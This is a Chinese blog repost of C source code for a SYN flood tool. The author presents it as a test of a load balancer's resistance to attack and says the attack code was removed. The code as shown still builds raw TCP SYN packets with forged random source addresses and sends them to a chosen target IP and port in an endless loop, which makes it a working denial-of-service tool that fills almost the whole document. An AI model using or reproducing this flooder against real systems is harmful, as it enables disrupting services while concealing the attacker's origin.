SYN FLOOD攻击-测试代码

/********************************************************************************************
* SYN Flood, Test on Red Hat Enterprise Linux AS release 3 (Taroon Update 5), gcc 3.23
* gcc -o syn_test -O3 syn_test.c
* change log:
* 	2006-12-01, code by yunshu(wustyunshu@hotmail.com), thx luoluo for fixing a bug.
* 	2006-12-05, yunshu fix a bug, version 1.0
* 	2006-12-26, thx bocai for reporting a bug, version 1.1
* 	2008-04-26 luoluo add type options to support syn_ack and fin_ack flood v1.2
*   2010-11-10 yunshu fix a little bug
*   2010-11-19 yunshu modify the sleep funtion, version 1.3.
*   2011-06-26 yunshu delete attack code, make it to be a testing tool.
*
*   it used to test loadblance, you have to change some code for attacking. 
*********************************************************************************************/
#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <pthread.h>
#include <errno.h>
 
typedef struct ip_hdr
{
    unsigned char       h_verlen;
    unsigned char       tos;
    unsigned short      total_len;
    unsigned short      ident;
    unsigned short      frag_and_flags;
    unsigned char       ttl;
    unsigned char       proto;
    unsigned short      checksum;
    unsigned int        sourceIP;
    unsigned int        destIP;
}IP_HEADER;
 
typedef struct tcp_hdr
{
    unsigned short      th_sport;
    unsigned short      th_dport;
    unsigned int        th_seq;
    unsigned int        th_ack;
    unsigned char       th_lenres;
    unsigned char       th_flag;
    unsigned short      th_win;
    unsigned short      th_sum;
    unsigned short      th_urp;
}TCP_HEADER;
 
typedef struct tsd_hdr
{
    unsigned long       saddr;
    unsigned long       daddr;
    char                mbz;
    char                ptcl;
    unsigned short      tcpl;
}PSD_HEADER;
 
#define PACKET_SIZE     sizeof(IP_HEADER) + sizeof( TCP_HEADER )
 
char    dst_ip[20] = { 0 };
int     dst_port;
unsigned long long sleeptime, starttime, outcount=0;
int pkt_then_sleep = 0;
 
unsigned short CheckSum(unsigned short * buffer, int size)
{
        unsigned long   cksum = 0;
 
        while (size > 1)
        {
                cksum += *buffer++;
                size -= sizeof(unsigned short);
        }
        if (size)
        {
                cksum += *(unsigned char *) buffer;
        }
        cksum = (cksum >> 16) + (cksum & 0xffff);
        cksum += (cksum >> 16);
 
        return (unsigned short) (~cksum);
}
 
void MySleep(unsigned int micro_second)
{
        struct timeval  t_timeval;
 
        t_timeval.tv_sec = 0;
        t_timeval.tv_usec = micro_second;
 
        select( 0, NULL, NULL, NULL, &t_timeval );
}
 
void Init( char *buffer )
{
        char    src_ip[20] = { 0 };
	int     n = 0;
 
        IP_HEADER       IpHeader;
        TCP_HEADER      TcpHeader;
        PSD_HEADER      PsdHeader;
 
        sprintf( src_ip, "%d.%d.%d.%d", rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1 );
 
        IpHeader.h_verlen = (4<<4 | sizeof(IpHeader)/sizeof(unsigned int));
        IpHeader.tos = 0;
        IpHeader.total_len = htons(sizeof(IpHeader)+sizeof(TcpHeader));
        IpHeader.ident = 1;
        IpHeader.frag_and_flags = 0x40;
        IpHeader.ttl = 255;
        IpHeader.proto = IPPROTO_TCP;
        IpHeader.checksum = 0;
        IpHeader.sourceIP = inet_addr(src_ip);
        IpHeader.destIP = inet_addr(dst_ip);
 
        TcpHeader.th_sport = htons( rand()%9000 + 1234 );
        TcpHeader.th_dport = htons( dst_port );
        TcpHeader.th_seq = htonl( rand()%90000000 + 2345 );
        TcpHeader.th_ack = 0;
        TcpHeader.th_lenres = (sizeof(TcpHeader)/4<<4|0);
        TcpHeader.th_flag = 0x02;
        TcpHeader.th_win = htons(512);
        TcpHeader.th_sum = 0;
        TcpHeader.th_urp = 0;
 
        PsdHeader.saddr = IpHeader.sourceIP;
        PsdHeader.daddr = IpHeader.destIP;
        PsdHeader.mbz = 0;
        PsdHeader.ptcl = IPPROTO_TCP;
        PsdHeader.tcpl = htons(sizeof(TcpHeader));
 
        memcpy( (void*)buffer, (void*)&PsdHeader, sizeof(PsdHeader) );
        memcpy( (void*)(buffer + sizeof(PsdHeader)), (void*)&TcpHeader, sizeof(TcpHeader) );
        TcpHeader.th_sum = CheckSum( (unsigned short *) buffer, sizeof(PsdHeader) + sizeof(TcpHeader) );
 
		memset( buffer, 0, PACKET_SIZE );
        memcpy( (void*)buffer, (void*)&IpHeader, sizeof(IpHeader) );
        IpHeader.checksum = CheckSum( (unsigned short *) buffer, sizeof(IpHeader) );
 
        //memcpy( (void*)buffer, (void*)&IpHeader, sizeof(IpHeader) );
        memcpy( (void*)(buffer+sizeof(IpHeader)), (void*)&TcpHeader, sizeof(TcpHeader) );
}
 
void Flood( )
{
        int     sock;
	int     flag = 1;
	char    buffer[PACKET_SIZE] = { 0 };
 
        struct  sockaddr_in     sa;
        memset( &sa, 0, sizeof(struct  sockaddr_in) );
        sa.sin_family = AF_INET;
        sa.sin_port = htons(dst_port);
        sa.sin_addr.s_addr = inet_addr(dst_ip);
 
        if ( ( sock = socket(PF_INET,SOCK_RAW,6) ) < 1 )
        {
                printf( "create socket error...%s\n", strerror(errno) );
                exit (-1);
        }
 
        if( setsockopt( sock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) < 0 )
        {
                printf("setsockopt error...%d\n", errno);
                exit (-1);
        }
 
	srand((unsigned) time(NULL));
 
	int     number = 0;
	if( sleeptime == 0 )
	{
		while(1)
		{
			memset( (void*)buffer, 0, PACKET_SIZE );
        		Init( buffer );
 
        		sendto( sock, buffer, PACKET_SIZE, 0, (struct sockaddr *)(&sa), sizeof(struct sockaddr_in) );
        		outcount ++;
		}
	}
	else
	{
		while(1)
		{
			memset( (void*)buffer, 0, PACKET_SIZE );
        		Init( buffer );
 
        		sendto( sock, buffer, PACKET_SIZE, 0, (struct sockaddr *)(&sa), sizeof(struct sockaddr_in) );
        		outcount ++;
			number ++;
 
			if( number == pkt_then_sleep )
                        {
				MySleep( sleeptime );
				number = 0;
                        }
                }
        }
}
 
void sig_proc(int signum)
{
	int ctime = 0;
 
        printf( "signal: %d\n", signum );
 
        ctime=time(NULL);
 
        printf("\n -- statistics -----------------------\n");
        printf("   packets sent:          %d\n",outcount);
        printf("   seconds active:        %d\n",ctime-starttime);
        printf("   average packet/second: %d\n",outcount/(ctime-starttime));
        printf(" -------------------------------------\n");
 
        exit(1);
}
 
int main(int argc,char *argv[])
{
	int ret = 0;
	pthread_t* my_thread = NULL;
	int a =0;
	int type = 0;
 
        if( argc != 5 )
        {
                fprintf(stderr,"\n%s <target ip> <target port> <pkt_then_sleep> <sleep_time>\n", argv[0]);
		fprintf(stderr, "send syn packets to <target ip>:<target port>, sleep <sleep_time> microseconds per <pkt_then_sleep> paskets\n\n");
                return -1;
        }
 
        strncpy( dst_ip, argv[1], 16 );
        dst_port = atoi( argv[2] );
 
        if( inet_addr(dst_ip) == INADDR_NONE )
        {      
                printf( "target ip error.\n" );
                return -1;
        }
 
        if( dst_port < 0 || dst_port > 65535 )
        {      
                printf( "port error.\n" );
                return -1;
        }
 
	pkt_then_sleep = atoi(argv[3]);
	if( pkt_then_sleep == 0 )
	{
		printf( "pkt_then_sleep error.\n" );
		return -1;
	}
        sleeptime = atoi(argv[4]);
 
        starttime = time(NULL);
        while(time(NULL) == starttime) usleep(1000);
 
        signal(SIGHUP,&sig_proc);
        signal(SIGINT,&sig_proc);
        signal(SIGQUIT,&sig_proc);
        signal(SIGILL,&sig_proc);
        signal(SIGABRT,&sig_proc);
        signal(SIGFPE,&sig_proc);
        signal(SIGSEGV,&sig_proc);
        signal(SIGPIPE,&sig_proc);
        signal(SIGALRM,&sig_proc);
        signal(SIGTERM,&sig_proc);
        signal(SIGUSR1,&sig_proc);
        signal(SIGUSR2,&sig_proc);
        signal(SIGCHLD,&sig_proc);
        signal(SIGCONT,&sig_proc);
        signal(SIGTSTP,&sig_proc);
        signal(SIGTTIN,&sig_proc);
        signal(SIGTTOU,&sig_proc);
 
        Flood();
 
        return 0;
}
 
没什么技术含量,就是为了做一个负载均衡设备的抗攻击能力测试而写的。不过这个也是我第一个linux下的小程序哈。

转自:http://www.icylife.net/yunshu/show.php?id=832

版权所有:《太阳花工作室》 => 《SYN FLOOD攻击-测试代码
本文地址:http://bg.artuion.com/win_lin_mac/235.html
除非注明,文章均为 《太阳花工作室》 原创,欢迎转载!转载请注明本文地址,谢谢。